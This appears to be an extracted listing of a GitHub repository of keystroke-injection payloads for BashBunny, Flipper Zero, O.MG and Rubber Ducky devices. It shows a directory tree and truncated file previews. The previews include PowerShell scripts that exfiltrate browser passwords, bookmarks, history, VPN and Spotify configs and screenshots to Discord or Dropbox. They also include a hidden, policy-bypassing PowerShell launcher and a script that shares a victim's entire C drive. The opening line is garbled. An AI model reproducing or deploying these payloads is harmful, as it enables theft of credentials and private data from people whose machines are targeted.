REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: OMG/payloads/Doc-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈¢er=true&size=3
gitextract_2ly3q691/
├── Assets/
│ └── placeholder
├── BashBunny/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BBB.ps1
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Browser-Grab/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── cApS-Troll/
│ │ ├── README.md
│ │ ├── a.ps1
│ │ └── payload.txt
│ └── placeholder
├── FlipperZero/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Browser-Devil/
│ │ └── Browser-Devil/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ └── cApS-Troll/
│ ├── README.md
│ ├── a.ps1
│ └── payload.txt
├── Functions/
│ ├── placeholder
│ └── tidal-log.ps1
├── OMG/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BH.ps1
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Browser-Grab/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── cApS-Troll/
│ │ ├── README.md
│ │ ├── a.ps1
│ │ └── payload.txt
│ └── placeholder
├── README.md
└── RubberDucky/
└── payloads/
├── Bookmark-Hog/
│ ├── BH.ps1
│ ├── README.md
│ └── payload.txt
├── Browser-Grab/
│ ├── README.md
│ ├── b.ps1
│ └── payload.txt
├── Copy-And-Waste/
│ ├── I.bat
│ ├── README.md
│ ├── c.ps1
│ ├── payload.txt
│ └── placeholder
├── De-Bloater/
│ ├── README.md
│ └── payload.txt
├── Doc-Hog/
│ ├── d.ps1
│ ├── payload.txt
│ └── readme.md
├── History-Pig/
│ ├── HP.ps1
│ ├── README.md
│ └── payload.txt
├── OVPN-Hog/
│ ├── o.ps1
│ ├── payload.txt
│ └── readme.md
├── Picture-Hog/
│ ├── p.ps1
│ └── placeholder
├── Powershell-History/
│ ├── PH.ps1
│ ├── README.md
│ └── payload.txt
├── Printer-Recon/
│ ├── PR.ps1
│ ├── README.md
│ └── payload.txt
├── Priv-Paths/
│ ├── README.md
│ └── payload.txt
├── Proton-Hog/
│ ├── README.md
│ ├── payload.txt
│ └── s.ps1
├── Pwn-Drive/
│ ├── README.md
│ ├── c.ps1
│ └── payload.txt
├── RanFunWare/
│ ├── README.md
│ ├── payload.txt
│ └── r.ps1
├── Screen-Shock/
│ ├── I.bat
│ ├── README.md
│ ├── c.ps1
│ ├── payload.txt
│ └── placeholder
├── Spotify-Spy/
│ ├── README.md
│ ├── SS.ps1
│ └── payload.txt
├── Water-UnMark/
│ ├── README.md
│ ├── payload.txt
│ └── placeholder
├── cApS-Troll/
│ ├── README.md
│ ├── a.ps1
│ └── payload.txt
└── placeholder
Condensed preview — 224 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (362K chars).
[
{
"path": "Assets/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/Bookmark-Hog/BBB.ps1",
"chars": 1630,
"preview": "#Bookmark-Hog\r\n\r\n# Get Drive Letter\r\n$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name\r\n\r\n# Test if directory exi"
},
{
"path": "BashBunny/payloads/Bookmark-Hog/README.md",
"chars": 2714,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n<h1 align=\"center\">\n <a "
},
{
"path": "BashBunny/payloads/Bookmark-Hog/payload.txt",
"chars": 547,
"preview": "# Title: Bookmark-Hog\r\n# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.\r\n# Auth"
},
{
"path": "BashBunny/payloads/Bookmark-Hog/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/Browser-Grab/README.md",
"chars": 3076,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Browser-Grab/b.ps1",
"chars": 1095,
"preview": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n "
},
{
"path": "BashBunny/payloads/Browser-Grab/payload.txt",
"chars": 616,
"preview": "REM Title: Browser-Grab\nREM Author: atomiczsec\nREM Description: A payload to exfiltrate bookmarks, passwords"
},
{
"path": "BashBunny/payloads/Copy-And-Waste/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "BashBunny/payloads/Copy-And-Waste/README.md",
"chars": 3544,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hre"
},
{
"path": "BashBunny/payloads/Copy-And-Waste/c.ps1",
"chars": 965,
"preview": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()"
},
{
"path": "BashBunny/payloads/Copy-And-Waste/payload.txt",
"chars": 809,
"preview": "REM Title: Copy-And-Waste\r\n\r\nREM Author: atomiczsec & I am Jakoby\r\n\r\nREM Description: This payload is meant "
},
{
"path": "BashBunny/payloads/Copy-And-Waste/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/De-Bloater/README.md",
"chars": 2950,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Doc-Hog/d.ps1",
"chars": 1311,
"preview": "function Doc-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]$"
},
{
"path": "BashBunny/payloads/Doc-Hog/payload.txt",
"chars": 627,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files. "
},
{
"path": "BashBunny/payloads/Doc-Hog/readme.md",
"chars": 2211,
"preview": "\r\n<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?li"
},
{
"path": "BashBunny/payloads/History-Pig/HP.ps1",
"chars": 2509,
"preview": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Defaul"
},
{
"path": "BashBunny/payloads/History-Pig/README.md",
"chars": 2931,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/History-Pig/payload.txt",
"chars": 563,
"preview": "REM Title: History-Pig\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bro"
},
{
"path": "BashBunny/payloads/OVPN-Hog/o.ps1",
"chars": 1138,
"preview": "function OVPN-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]"
},
{
"path": "BashBunny/payloads/OVPN-Hog/payload.txt",
"chars": 615,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files l"
},
{
"path": "BashBunny/payloads/OVPN-Hog/readme.md",
"chars": 2338,
"preview": "<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?line"
},
{
"path": "BashBunny/payloads/Powershell-History/PH.ps1",
"chars": 1801,
"preview": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\C"
},
{
"path": "BashBunny/payloads/Powershell-History/README.md",
"chars": 2967,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Powershell-History/payload.txt",
"chars": 616,
"preview": "REM Title: Powershell-History\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltr"
},
{
"path": "BashBunny/payloads/Printer-Recon/PR.ps1",
"chars": 1391,
"preview": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alia"
},
{
"path": "BashBunny/payloads/Printer-Recon/README.md",
"chars": 2812,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Printer-Recon/payload.txt",
"chars": 668,
"preview": "REM Title: Printer-Recon\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate p"
},
{
"path": "BashBunny/payloads/Priv-Paths/README.md",
"chars": 2761,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Priv-Paths/payload.txt",
"chars": 715,
"preview": "REM Title: Priv-Paths\r\nREM Author: atomiczsec\r\nREM Description: A payload to enumerate unqouted service path"
},
{
"path": "BashBunny/payloads/Proton-Hog/README.md",
"chars": 2944,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Proton-Hog/payload.txt",
"chars": 613,
"preview": "REM Title: Proton-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: A payload to exfiltrate the user config "
},
{
"path": "BashBunny/payloads/Proton-Hog/s.ps1",
"chars": 1490,
"preview": "function DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromP"
},
{
"path": "BashBunny/payloads/Pwn-Drive/README.md",
"chars": 2869,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hr"
},
{
"path": "BashBunny/payloads/Pwn-Drive/c.ps1",
"chars": 614,
"preview": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n"
},
{
"path": "BashBunny/payloads/Pwn-Drive/payload.txt",
"chars": 593,
"preview": "REM Title: Pwn-Drive\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload will share the entire victim"
},
{
"path": "BashBunny/payloads/RanFunWare/README.md",
"chars": 2914,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n <"
},
{
"path": "BashBunny/payloads/RanFunWare/payload.txt",
"chars": 579,
"preview": "REM Title: RanFunWare\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload will prank your target into"
},
{
"path": "BashBunny/payloads/RanFunWare/r.ps1",
"chars": 1875,
"preview": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path "
},
{
"path": "BashBunny/payloads/Screen-Shock/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "BashBunny/payloads/Screen-Shock/README.md",
"chars": 3495,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a "
},
{
"path": "BashBunny/payloads/Screen-Shock/c.ps1",
"chars": 1829,
"preview": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)"
},
{
"path": "BashBunny/payloads/Screen-Shock/payload.txt",
"chars": 839,
"preview": "REM Title: Screen-Shock\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate sc"
},
{
"path": "BashBunny/payloads/Screen-Shock/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/Spotify-Spy/README.md",
"chars": 3024,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Spotify-Spy/SS.ps1",
"chars": 1441,
"preview": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r"
},
{
"path": "BashBunny/payloads/Spotify-Spy/payload.txt",
"chars": 670,
"preview": "REM Title: Spotify-Spy\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate spo"
},
{
"path": "BashBunny/payloads/Water-UnMark/README.md",
"chars": 2798,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"ce"
},
{
"path": "BashBunny/payloads/Water-UnMark/payload.txt",
"chars": 536,
"preview": "REM Title: Water-UnMark\r\nREM Author: atomiczsec\r\nREM Target OS: Windows 10\r\nREM Description: This script w"
},
{
"path": "BashBunny/payloads/Water-UnMark/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/cApS-Troll/README.md",
"chars": 2997,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/cApS-Troll/a.ps1",
"chars": 501,
"preview": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep"
},
{
"path": "BashBunny/payloads/cApS-Troll/payload.txt",
"chars": 569,
"preview": "REM Title: cApS-Troll\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to prank your vict"
},
{
"path": "BashBunny/payloads/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/Bookmark-Hog/BH.ps1",
"chars": 2478,
"preview": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Defau"
},
{
"path": "FlipperZero/payloads/Bookmark-Hog/README.md",
"chars": 3036,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n <a"
},
{
"path": "FlipperZero/payloads/Bookmark-Hog/payload.txt",
"chars": 327,
"preview": "REM Title: Bookmark-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate bookma"
},
{
"path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/README.md",
"chars": 3139,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/b.ps1",
"chars": 1090,
"preview": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n "
},
{
"path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/payload.txt",
"chars": 585,
"preview": "REM Title: Browser-Devil\nREM Author: atomiczsec\nREM Description: A payload to exfiltrate bookmarks, password"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/README.md",
"chars": 3544,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hre"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/c.ps1",
"chars": 965,
"preview": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/payload.txt",
"chars": 807,
"preview": "REM Title: Copy-And-Waste\r\nREM Author: atomiczsec & I am Jakoby\r\nREM Description: This payload is meant to e"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/De-Bloater/README.md",
"chars": 2798,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"ce"
},
{
"path": "FlipperZero/payloads/De-Bloater/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/Doc-Hog/d.ps1",
"chars": 1311,
"preview": "function Doc-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]$"
},
{
"path": "FlipperZero/payloads/Doc-Hog/payload.txt",
"chars": 556,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files. "
},
{
"path": "FlipperZero/payloads/Doc-Hog/readme.md",
"chars": 2211,
"preview": "\r\n<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?li"
},
{
"path": "FlipperZero/payloads/History-Pig/HP.ps1",
"chars": 2509,
"preview": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Defaul"
},
{
"path": "FlipperZero/payloads/History-Pig/README.md",
"chars": 2931,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/History-Pig/payload.txt",
"chars": 553,
"preview": "REM Title: History-Pig\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate browser"
},
{
"path": "FlipperZero/payloads/OVPN-Hog/o.ps1",
"chars": 1138,
"preview": "function OVPN-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]"
},
{
"path": "FlipperZero/payloads/OVPN-Hog/payload.txt",
"chars": 581,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files l"
},
{
"path": "FlipperZero/payloads/OVPN-Hog/readme.md",
"chars": 2338,
"preview": "<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?line"
},
{
"path": "FlipperZero/payloads/Powershell-History/PH.ps1",
"chars": 1801,
"preview": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\C"
},
{
"path": "FlipperZero/payloads/Powershell-History/README.md",
"chars": 2967,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Powershell-History/payload.txt",
"chars": 606,
"preview": "REM Title: Powershell-History\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate "
},
{
"path": "FlipperZero/payloads/Printer-Recon/PR.ps1",
"chars": 1391,
"preview": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alia"
},
{
"path": "FlipperZero/payloads/Printer-Recon/README.md",
"chars": 2812,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Printer-Recon/payload.txt",
"chars": 658,
"preview": "REM Title: Printer-Recon\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate print"
},
{
"path": "FlipperZero/payloads/Priv-Paths/README.md",
"chars": 2761,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Priv-Paths/payload.txt",
"chars": 795,
"preview": "REM Title: Priv-Paths\r\nREM Author: atomiczsec\r\nREM Description: A payload to enumerate unqouted service path"
},
{
"path": "FlipperZero/payloads/Proton-Hog/README.md",
"chars": 2944,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Proton-Hog/payload.txt",
"chars": 603,
"preview": "REM Title: Proton-Hog\r\nREM Author: atomiczsec\r\nREM Description: A payload to exfiltrate the user config file"
},
{
"path": "FlipperZero/payloads/Proton-Hog/s.ps1",
"chars": 1490,
"preview": "function DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromP"
},
{
"path": "FlipperZero/payloads/Pwn-Drive/README.md",
"chars": 2869,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hr"
},
{
"path": "FlipperZero/payloads/Pwn-Drive/c.ps1",
"chars": 614,
"preview": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n"
},
{
"path": "FlipperZero/payloads/Pwn-Drive/payload.txt",
"chars": 583,
"preview": "REM Title: Pwn-Drive\r\nREM Author: atomiczsec\r\nREM Description: This payload will share the entire victims \"C"
},
{
"path": "FlipperZero/payloads/RanFunWare/README.md",
"chars": 2914,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n <"
},
{
"path": "FlipperZero/payloads/RanFunWare/payload.txt",
"chars": 569,
"preview": "REM Title: RanFunWare\r\nREM Author: atomiczsec\r\nREM Description: This payload will prank your target into thi"
},
{
"path": "FlipperZero/payloads/RanFunWare/r.ps1",
"chars": 1875,
"preview": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path "
},
{
"path": "FlipperZero/payloads/Screen-Shock/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "FlipperZero/payloads/Screen-Shock/README.md",
"chars": 3495,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a "
},
{
"path": "FlipperZero/payloads/Screen-Shock/c.ps1",
"chars": 1828,
"preview": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True"
},
{
"path": "FlipperZero/payloads/Screen-Shock/payload.txt",
"chars": 829,
"preview": "REM Title: Screen-Shock\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate screen"
},
{
"path": "FlipperZero/payloads/Screen-Shock/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/Spotify-Spy/README.md",
"chars": 3024,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Spotify-Spy/SS.ps1",
"chars": 1441,
"preview": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r"
},
{
"path": "FlipperZero/payloads/Spotify-Spy/payload.txt",
"chars": 650,
"preview": "REM Title: Spotify-Spy\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate spotify"
},
{
"path": "FlipperZero/payloads/Water-UnMark/README.md",
"chars": 2798,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"ce"
},
{
"path": "FlipperZero/payloads/Water-UnMark/payload.txt",
"chars": 534,
"preview": "REM Title: Water-UnMark\r\nREM Author: atomiczsec\r\nREM Target OS: Windows 10\r\nREM Description: This script w"
},
{
"path": "FlipperZero/payloads/Water-UnMark/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/cApS-Troll/README.md",
"chars": 2997,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
